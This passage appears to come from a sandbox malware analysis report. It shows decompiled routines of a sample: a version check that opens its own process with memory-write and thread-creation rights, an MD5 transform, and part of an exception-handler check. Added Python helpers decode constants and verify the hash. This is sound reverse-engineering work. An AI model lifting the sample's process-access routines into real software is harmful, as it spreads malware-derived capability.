            • CloseHandle.KERNEL32(00000000), ref: 007E3133
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
            • String ID: |}~
            • API String ID: 420147892-2407928742
            • Opcode ID: 3a75d01201fdd7d3e10ff5e854e0157e7f6eb08246c2e209546d6875c1b3538b
            • Instruction ID: 337a90cb8dd1821a4a4a9ba014b1ec33a13997a2c82cd366ead39361bd172804
            • Opcode Fuzzy Hash: 3a75d01201fdd7d3e10ff5e854e0157e7f6eb08246c2e209546d6875c1b3538b
            • Instruction Fuzzy Hash: 12F0BB321035D8AAD720A7679C4DEEB37ACDFCD350F010065FA45C7001EA3CDB5686A1
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00401D68() {
            				// Creates the module's event, rejects Windows versions older than 5.1 (XP) and opens a handle to
            				// the current process with the rights needed to write its memory and create threads in it.
            				void* _t1;
            				unsigned int _t3;
            				void* _t4;
            				long _t5;
            				void* _t6;
            				intOrPtr _t10;
            				void* _t14;
            
            				_t10 =  *0x404170;
            				_t1 = CreateEventA(0, 1, 0, 0); // manual-reset, initially non-signalled, unnamed
            				 *0x40417c = _t1;
            				if(_t1 == 0) {
            					return GetLastError();
            				}
            				_t3 = GetVersion(); // low byte = major version, second byte = minor version
            				if(_t3 != 5) { // decompiler rendering of a compare of the major-version byte against 5
            					L4:
            					if(_t14 <= 0) { // major < 5
            						_t4 = 0x32; // ERROR_NOT_SUPPORTED
            						return _t4;
            					} else {
            						goto L5;
            					}
            				} else {
            					if(_t3 >> 8 > 0) { // major == 5 and minor >= 1, i.e. XP or later
            						L5:
            						 *0x40416c = _t3;
            						_t5 = GetCurrentProcessId();
            						 *0x404168 = _t5;
            						 *0x404170 = _t10;
            						// 0x10047a = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE
            						//          | PROCESS_DUP_HANDLE | PROCESS_QUERY_INFORMATION | SYNCHRONIZE
            						_t6 = OpenProcess(0x10047a, 0, _t5);
            						 *0x404164 = _t6;
            						if(_t6 == 0) {
            							 *0x404164 =  *0x404164 | 0xffffffff; // fall back to -1, the pseudo-handle value GetCurrentProcess() returns
            						}
            						return 0;
            					} else {
            						_t14 = _t3 - _t3; // version 5.0: the flags of the earlier compare, rendered by the decompiler as a subtraction
            						goto L4;
            					}
            				}
            			}

            Instruction addresses: 0x00401d69 to 0x00401ddb

            APIs
            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,004019FC), ref: 00401D77
            • GetVersion.KERNEL32 ref: 00401D86
            • GetCurrentProcessId.KERNEL32 ref: 00401DA2
            • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401DBB
            Memory Dump Source
            • Source File: 00000000.00000002.509472273.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.509472273.0000000000403000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.509472273.0000000000405000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.509472273.0000000000407000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: Process$CreateCurrentEventOpenVersion
            • String ID:
            • API String ID: 845504543-0
            • Opcode ID: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
            • Instruction ID: a5005e0615366c288a960c89f9170266babf83a3c5a8d8e9540ac284067a1926
            • Opcode Fuzzy Hash: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
            • Instruction Fuzzy Hash: 79F0AFB05813009BE7509F78BE0DB563F64AB95712F000036E601FA2F8D7709982CB5C
            Uniqueness

            Uniqueness Score: -1.00%
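            Several listings above leave raw 32-bit immediates for the reader to decode: the `// 0x616d692f` and `// 0x6976612e` annotations in E007E1D8A and `// 0x73617661` in E007E30D5 are the first four bytes of strings, and the 0x10047A passed to OpenProcess in E00401D68 is an access mask. The Python below is an added example, not part of this report or of Joe Sandbox: it parses the report's API trace lines, decodes dword immediates as little-endian ASCII, and names the process access rights. The sample trace and listing lines are copied from this page; the regular expressions describe this page's rendering of the trace and are an assumption about that format, not a documented Joe Sandbox export.

```python
import re
import struct

# Process access rights from winnt.h, for decoding the dwDesiredAccess argument of OpenProcess.
PROCESS_ACCESS_BITS = {
    0x00000001: "PROCESS_TERMINATE",
    0x00000002: "PROCESS_CREATE_THREAD",
    0x00000008: "PROCESS_VM_OPERATION",
    0x00000010: "PROCESS_VM_READ",
    0x00000020: "PROCESS_VM_WRITE",
    0x00000040: "PROCESS_DUP_HANDLE",
    0x00000080: "PROCESS_CREATE_PROCESS",
    0x00000100: "PROCESS_SET_QUOTA",
    0x00000200: "PROCESS_SET_INFORMATION",
    0x00000400: "PROCESS_QUERY_INFORMATION",
    0x00000800: "PROCESS_SUSPEND_RESUME",
    0x00001000: "PROCESS_QUERY_LIMITED_INFORMATION",
    0x00010000: "DELETE",
    0x00020000: "READ_CONTROL",
    0x00040000: "WRITE_DAC",
    0x00080000: "WRITE_OWNER",
    0x00100000: "SYNCHRONIZE",
}


def decode_process_access(mask):
    """Name every set bit of an OpenProcess access mask, lowest bit first; unknown leftovers are kept as hex."""
    names = []
    remaining = mask
    for bit, name in sorted(PROCESS_ACCESS_BITS.items()):
        if mask & bit:
            names.append(name)
            remaining &= ~bit
    if remaining:
        names.append(hex(remaining))
    return names


def decode_ascii_dword(value):
    """Read a 32-bit immediate as four little-endian bytes; return the text if all are printable ASCII, else None."""
    raw = struct.pack("<I", value & 0xFFFFFFFF)
    if all(0x20 <= b < 0x7F for b in raw):
        return raw.decode("ascii")
    return None


# One "APIs" line of the report as rendered on this page (assumed format), e.g.
#   • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401DBB
#   • Part of subcall function 007E1508: CryptAcquireContextW.ADVAPI32(?,...), ref: 007E1540
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# The decompiler annotates rebased pointers with the dword found at the target, e.g.
#   _t22 = _t54 + 0x7eb5f3; // 0x616d692f
IMMEDIATE_COMMENT = re.compile(r"//\s*0x([0-9A-Fa-f]{1,8})\b")


def parse_api_line(line):
    """Turn one trace line into a dict; '?' arguments (not recovered by the sandbox) become None."""
    m = API_LINE.match(line)
    if not m:
        return None
    args = []
    if m.group("args"):
        for a in m.group("args").split(","):
            a = a.strip()
            args.append(None if a == "?" else int(a, 16))
    return {"api": m.group("api"), "module": m.group("module"), "args": args,
            "ref": int(m.group("ref"), 16), "caller": m.group("caller")}


def annotate_api_lines(lines):
    """Parse every trace line and attach decoded constants where the call is one we understand."""
    out = []
    for line in lines:
        entry = parse_api_line(line)
        if entry is None:
            continue
        notes = []
        if entry["api"] == "OpenProcess" and entry["args"] and entry["args"][0] is not None:
            notes.append("access=" + "|".join(decode_process_access(entry["args"][0])))
        for a in entry["args"]:
            text = decode_ascii_dword(a) if a is not None else None
            if text:
                notes.append("ascii=%r" % text)
        entry["notes"] = notes
        out.append(entry)
    return out


def decode_immediate_comments(listing_lines):
    """Collect (value, ascii-or-None) pairs from '// 0x........' comments in a decompiled listing."""
    found = []
    for line in listing_lines:
        for hexval in IMMEDIATE_COMMENT.findall(line):
            value = int(hexval, 16)
            found.append((value, decode_ascii_dword(value)))
    return found


# Lines copied from the API traces of E00401D68 and E007E5063 on this page.
SAMPLE_API_LINES = [
    "• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,004019FC), ref: 00401D77",
    "• GetVersion.KERNEL32 ref: 00401D86",
    "• GetCurrentProcessId.KERNEL32 ref: 00401DA2",
    "• OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401DBB",
    "  • Part of subcall function 007E1508: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,007E5088,00000001,007E3ECE,00000000), ref: 007E1540",
]

# Lines copied from the listings of E007E30D5 and E007E1D8A on this page.
SAMPLE_LISTING_LINES = [
    "_t2 = _t9 + 0x7ebe88; // 0x73617661",
    "_t22 = _t54 + 0x7eb5f3; // 0x616d692f",
    "_t23 = _t57 + 0x7eb899; // 0x6976612e",
    "_t28 =  *0x7ea344; // 0x43175ac3",
]

if __name__ == "__main__":
    for e in annotate_api_lines(SAMPLE_API_LINES):
        print("%08X %s.%s %s" % (e["ref"], e["module"], e["api"], " ".join(e["notes"])))
    for value, text in decode_immediate_comments(SAMPLE_LISTING_LINES):
        print("0x%08x -> %r" % (value, text))
```

            Only the first four bytes of each string survive in the decompiler comment, so the decoded fragments ("/ima", ".avi", "avas") locate the strings but do not complete them; the full text has to be read from the associated memory dump at the rebased address.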

            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.509728577.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_780000_server.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID: .$GetProcAddress.$l
            • API String ID: 0-2784972518
            • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
            • Instruction ID: 1050865b8f551beb30e40799f8e93d2cdd75059be690525d97bedd8af62775e7
            • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
            • Instruction Fuzzy Hash: 83318AB6900609CFDB10DF99C884AAEBBF9FF08324F25404AD841A7311D775EA49CBA4
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 49%
            			E007E16DF(void* __ecx, void* _a4) {
            				signed int _v8;
            				signed int _v12;
            				intOrPtr _v16;
            				intOrPtr _v20;
            				intOrPtr _v24;
            				intOrPtr _v28;
            				intOrPtr _v32;
            				intOrPtr _v36;
            				intOrPtr _v40;
            				intOrPtr _v44;
            				intOrPtr _v48;
            				intOrPtr _v52;
            				intOrPtr _v56;
            				intOrPtr _v60;
            				intOrPtr _v64;
            				intOrPtr _v68;
            				intOrPtr _v72;
            				void _v76;
            				intOrPtr* _t226;
            				signed int _t229;
            				signed int _t231;
            				signed int _t233;
            				signed int _t235;
            				signed int _t237;
            				signed int _t239;
            				signed int _t241;
            				signed int _t243;
            				signed int _t245;
            				signed int _t247;
            				signed int _t249;
            				signed int _t251;
            				signed int _t253;
            				signed int _t255;
            				signed int _t257;
            				signed int _t259;
            				signed int _t338;
            				signed char* _t348;
            				signed int _t349;
            				signed int _t351;
            				signed int _t353;
            				signed int _t355;
            				signed int _t357;
            				signed int _t359;
            				signed int _t361;
            				signed int _t363;
            				signed int _t365;
            				signed int _t367;
            				signed int _t376;
            				signed int _t378;
            				signed int _t380;
            				signed int _t382;
            				signed int _t384;
            				intOrPtr* _t400;
            				signed int* _t401;
            				signed int _t402;
            				signed int _t404;
            				signed int _t406;
            				signed int _t408;
            				signed int _t410;
            				signed int _t412;
            				signed int _t414;
            				signed int _t416;
            				signed int _t418;
            				signed int _t420;
            				signed int _t422;
            				signed int _t424;
            				signed int _t432;
            				signed int _t434;
            				signed int _t436;
            				signed int _t438;
            				signed int _t440;
            				signed int _t508;
            				signed int _t599;
            				signed int _t607;
            				signed int _t613;
            				signed int _t679;
            				void* _t682;
            				signed int _t683;
            				signed int _t685;
            				signed int _t690;
            				signed int _t692;
            				signed int _t697;
            				signed int _t699;
            				signed int _t718;
            				signed int _t720;
            				signed int _t722;
            				signed int _t724;
            				signed int _t726;
            				signed int _t728;
            				signed int _t734;
            				signed int _t740;
            				signed int _t742;
            				signed int _t744;
            				signed int _t746;
            				signed int _t748;
            
            				_t1 =  &_a4; // 0x7e544b
            				_t226 =  *_t1;
            				_t348 = __ecx + 2;
            				_t401 =  &_v76;
            				_t682 = 0x10;
            				do { // assemble the 64-byte block (pointer in ecx) into 16 little-endian dwords _v76.._v16
            					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
            					_t401 =  &(_t401[1]);
            					_t348 =  &(_t348[4]);
            					_t682 = _t682 - 1;
            				} while (_t682 != 0);
            				_t683 =  *(_t226 + 4);
            				_t402 =  *(_t226 + 8);
            				_t349 =  *(_t226 + 0xc);
            				// MD5 round 1, F(b,c,d) = (b & c) | (~b & d); rotations 7, 12, 17, 22 (17 and 22 are rendered as ror 0xf / ror 0xa)
            				asm("rol eax, 0x7");
            				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
            				asm("rol ecx, 0xc");
            				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
            				asm("ror edx, 0xf");
            				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
            				asm("ror esi, 0xa");
            				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
            				_v8 = _t685;
            				_t690 = _v8;
            				asm("rol eax, 0x7");
            				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
            				asm("rol ecx, 0xc");
            				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
            				asm("ror edx, 0xf");
            				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
            				asm("ror esi, 0xa");
            				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
            				_v8 = _t692;
            				_t697 = _v8;
            				asm("rol eax, 0x7");
            				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
            				asm("rol ecx, 0xc");
            				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
            				asm("ror edx, 0xf");
            				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
            				asm("ror esi, 0xa");
            				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
            				_v8 = _t699;
            				asm("rol eax, 0x7");
            				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
            				asm("rol ecx, 0xc");
            				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
            				_t508 =  !_t357;
            				asm("ror edx, 0xf");
            				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
            				_v12 = _t410;
            				_v12 =  !_v12;
            				asm("ror esi, 0xa");
            				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
            				// MD5 round 2, G(b,c,d) = (b & d) | (c & ~d); rotations 5, 9, 14, 20; message words x[(5i+1) mod 16]
            				asm("rol eax, 0x5");
            				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
            				asm("rol ecx, 0x9");
            				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
            				asm("rol edx, 0xe");
            				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
            				asm("ror esi, 0xc");
            				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
            				asm("rol eax, 0x5");
            				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
            				asm("rol ecx, 0x9");
            				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
            				asm("rol edx, 0xe");
            				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
            				asm("ror esi, 0xc");
            				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
            				asm("rol eax, 0x5");
            				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
            				asm("rol ecx, 0x9");
            				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
            				asm("rol edx, 0xe");
            				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
            				asm("ror esi, 0xc");
            				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
            				asm("rol eax, 0x5");
            				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
            				asm("rol ecx, 0x9");
            				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
            				asm("rol edx, 0xe");
            				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
            				asm("ror esi, 0xc");
            				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
            				// MD5 round 3, H(b,c,d) = b ^ c ^ d; rotations 4, 11, 16, 23; message words x[(3i+5) mod 16]
            				asm("rol eax, 0x4");
            				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
            				asm("rol ecx, 0xb");
            				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
            				asm("rol edx, 0x10");
            				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
            				_t599 = _t367 ^ _t420;
            				asm("ror esi, 0x9");
            				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
            				asm("rol eax, 0x4");
            				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
            				asm("rol edi, 0xb");
            				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
            				asm("rol edx, 0x10");
            				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
            				_t338 = _t607 ^ _t422;
            				asm("ror ecx, 0x9");
            				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
            				asm("rol eax, 0x4");
            				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
            				asm("rol esi, 0xb");
            				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
            				asm("rol edi, 0x10");
            				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
            				_t424 = _t734 ^ _t613;
            				asm("ror ecx, 0x9");
            				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
            				asm("rol eax, 0x4");
            				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
            				asm("rol edx, 0xb");
            				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
            				asm("rol esi, 0x10");
            				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
            				asm("ror ecx, 0x9");
            				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
            				// MD5 round 4, I(b,c,d) = c ^ (b | ~d); rotations 6, 10, 15, 21; message words x[7i mod 16]
            				asm("rol eax, 0x6");
            				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
            				asm("rol edx, 0xa");
            				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
            				asm("rol esi, 0xf");
            				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
            				asm("ror ecx, 0xb");
            				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
            				asm("rol eax, 0x6");
            				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
            				asm("rol edx, 0xa");
            				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
            				asm("rol esi, 0xf");
            				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
            				asm("ror ecx, 0xb");
            				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
            				asm("rol eax, 0x6");
            				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
            				asm("rol edx, 0xa");
            				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
            				asm("rol esi, 0xf");
            				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
            				asm("ror edi, 0xb");
            				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
            				asm("rol eax, 0x6");
            				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
            				asm("rol edx, 0xa");
            				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
            				_t400 = _a4;
            				asm("rol esi, 0xf");
            				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
            				 *_t400 =  *_t400 + _t259; // state[0..3] += a, b, c, d; the state block is the _a4 argument
            				asm("ror eax, 0xb");
            				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
            				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
            				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
            				return memset( &_v76, 0, 0x40); // wipe the 64-byte block copy from the stack before returning
            			}
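            The routine above is an MD5 block transform: the additive constants are the MD5 sine table printed as signed 32-bit literals (-0x28955b88 is 0xd76aa478), the rotation amounts are 7/12/17/22, 5/9/14/20, 4/11/16/23 and 6/10/15/21 (the decompiler shows rol 17 as ror 0xf), the 16-iteration loop loads the message words little-endian from the block pointed to by ecx, and the tail adds the four working values back into the state passed in _a4 before wiping the block buffer. The Python below is an added reference implementation written for this page; it is not code from the sample or from Joe Sandbox. It reproduces the compression function, checks that the 16 round-1 literals copied from the listing are the standard table, and goes one step further than the listing by adding the padding and comparing the full digest against hashlib on constructed inputs.

```python
"""Added reference implementation of the MD5 block transform that E007E16DF
computes. Not code from the sample; inputs are constructed test strings."""
import hashlib
import math
import struct

MASK = 0xFFFFFFFF

# Standard MD5 round constants T[i] = floor(2**32 * |sin(i + 1)|).
T = [int(abs(math.sin(i + 1)) * (1 << 32)) & MASK for i in range(64)]

# Per-step left rotations. The listing shows rol 17 / rol 22 as
# "ror edx, 0xf" / "ror esi, 0xa", which is the same operation.
S = ([7, 12, 17, 22] * 4 + [5, 9, 14, 20] * 4
     + [4, 11, 16, 23] * 4 + [6, 10, 15, 21] * 4)

# Round-1 additive constants exactly as the decompiler printed them (signed).
LISTING_ROUND1 = [-0x28955b88, -0x173848aa, 0x242070db, -0x3e423112,
                  -0xa83f051, 0x4787c62a, -0x57cfb9ed, -0x2b96aff,
                  0x698098d8, -0x74bb0851, -0xa44f, -0x76a32842,
                  0x6b901122, -0x2678e6d, -0x5986bc72, 0x49b40821]


def as_u32(signed_literal):
    """Map a decompiler signed literal back to the unsigned 32-bit constant."""
    return signed_literal & MASK


def listing_constants_match():
    """True if the 16 round-1 literals from the listing equal T[0..15]."""
    return [as_u32(v) for v in LISTING_ROUND1] == T[:16]


def rol(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md5_transform(state, block):
    """One 64-byte block through the four MD5 rounds; mutates state (4 words)."""
    if len(block) != 64:
        raise ValueError("MD5 compresses exactly 64 bytes per call")
    # The loop at the top of the listing builds each word from four bytes,
    # low byte first: a little-endian dword load.
    x = list(struct.unpack('<16I', block))
    a, b, c, d = state
    for i in range(64):
        if i < 16:                      # F: "(!b & d | c & b)" in the listing
            f, g = (b & c) | (~b & d & MASK), i
        elif i < 32:                    # G
            f, g = (d & b) | (~d & c & MASK), (5 * i + 1) % 16
        elif i < 48:                    # H
            f, g = b ^ c ^ d, (3 * i + 5) % 16
        else:                           # I: "((!d | b) ^ c)" in the listing
            f, g = c ^ (b | (~d & MASK)), (7 * i) % 16
        new_b = (b + rol((a + f + T[i] + x[g]) & MASK, S[i])) & MASK
        a, d, c, b = d, c, b, new_b
    # Tail of the listing: *state += a, b, c, d, then memset(block, 0, 0x40).
    for k, v in enumerate((a, b, c, d)):
        state[k] = (state[k] + v) & MASK
    return state


def md5_hex(data):
    """Full MD5: standard padding, then one transform per 64-byte block."""
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    padded = (data + b'\x80' + b'\x00' * ((55 - len(data)) % 64)
              + struct.pack('<Q', len(data) * 8))
    for off in range(0, len(padded), 64):
        md5_transform(state, padded[off:off + 64])
    return struct.pack('<4I', *state).hex()


def matches_hashlib(data):
    """Cross-check the hand-written transform against the library digest."""
    return md5_hex(data) == hashlib.md5(data).hexdigest()


if __name__ == '__main__':
    print("round-1 literals are the MD5 table:", listing_constants_match())
    for msg in (b'', b'abc', b'A' * 200):       # constructed inputs
        print(msg[:8], md5_hex(msg), matches_hashlib(msg))
```

            The same check works for any decompiled hash: convert the signed literals with as_u32, compare them to the expected table, and confirm the rotation pattern; an MD5 with altered constants or rotations would fail listing_constants_match while still looking like MD5 at a glance.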

            Instruction address column for E007E16DF (collapsed): 0x007e16e2 to 0x007e1d87

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: memset
            • String ID: KT~
            • API String ID: 2221118986-3940843352
            • Opcode ID: 731c4c0f351f3efb1da8e5c57353aa3635b345d7971c0b598f3b3c7e53c72fd3
            • Instruction ID: 626e48845088ad36b6fd8623a078050afb049879f6a5d7c90b210b9cb2577e99
            • Opcode Fuzzy Hash: 731c4c0f351f3efb1da8e5c57353aa3635b345d7971c0b598f3b3c7e53c72fd3
            • Instruction Fuzzy Hash: 2122857BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E007E8551(long _a4) {
            				intOrPtr _v8;
            				intOrPtr _v12;
            				signed int _v16;
            				short* _v32;
            				void _v36;
            				void* _t57;
            				signed int _t58;
            				signed int _t61;
            				signed int _t62;
            				void* _t63;
            				signed int* _t68;
            				intOrPtr* _t69;
            				intOrPtr* _t71;
            				intOrPtr _t72;
            				intOrPtr _t75;
            				void* _t76;
            				signed int _t77;
            				void* _t78;
            				void _t80;
            				signed int _t81;
            				signed int _t84;
            				signed int _t86;
            				short* _t87;
            				void* _t89;
            				signed int* _t90;
            				long _t91;
            				signed int _t93;
            				signed int _t94;
            				signed int _t100;
            				signed int _t102;
            				void* _t104;
            				long _t108;
            				signed int _t110;
            
            				_t108 = _a4;
            				_t76 =  *(_t108 + 8);
            				if((_t76 & 0x00000003) != 0) { // record+8 is the scope table pointer; it must be 4-byte aligned
            					L3:
            					return 0;
            				}
            				_a4 =  *[fs:0x4]; // TEB StackBase
            				_v8 =  *[fs:0x8]; // TEB StackLimit
            				if(_t76 < _v8 || _t76 >= _a4) { // a scope table that lies on the current stack is rejected (L3 returns 0)
            					_t102 =  *(_t108 + 0xc); // current try level; -1 means no active try block
            					__eflags = _t102 - 0xffffffff;
            					if(_t102 != 0xffffffff) {
            						_t91 = 0;
            						__eflags = 0;
            						_a4 = 0;
            						_t57 = _t76;
            						do {
            							_t80 =  *_t57;
